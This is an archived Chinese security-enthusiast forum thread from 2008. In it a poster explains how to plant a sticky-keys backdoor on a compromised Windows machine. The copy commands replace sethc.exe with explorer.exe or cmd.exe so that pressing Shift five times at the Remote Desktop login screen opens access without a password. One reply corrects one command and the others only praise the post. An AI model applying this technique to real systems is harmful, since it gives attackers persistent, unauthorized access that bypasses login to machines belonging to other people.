【3.A.S.T】网络安全爱好者's Archiver

黑客学习

wmmy 发表于 2008-8-25 12:35

无需输入密码登录3389

在肉鸡上执行命令
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe

copy c:\windows\system32\cmd.exe c:\windows\system32\dllcache\sethc.exe
以后再连接肉鸡3389,敲5下shift键就


据说很老的技术了,作为后门是个不错的思路

原理:
有人发现在登录之前连续按5下shift能够激活 粘滞键,也就是 sethc.exe
那么将这个文件替换掉,就能够执行别的程序

explorer.exe是资源管理器,其实换成CMD的话可能很多人更能够清楚的知道去做什么

無盡空虛 发表于 2008-8-25 12:57

顶你    ~~~!

enrc 发表于 2008-8-25 14:17

很强!!!;P

saitojie 发表于 2008-8-25 15:06

第二个应该是copy c:\windows\system32\cmd.exe c:\windows\system32\dllcache\sethc.exe

柔肠寸断 发表于 2008-8-27 09:29

回复 4楼 saitojie 的帖子

OK

我把修改了

就是一个后门咯

无道亦道 发表于 2008-8-27 20:32

很好   很强   学习下~~`

963852 发表于 2008-9-3 21:32

了解一下,没有试过,还是学习一下才:D :D

ohsky000 发表于 2010-2-15 00:15

不错不错~~~

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.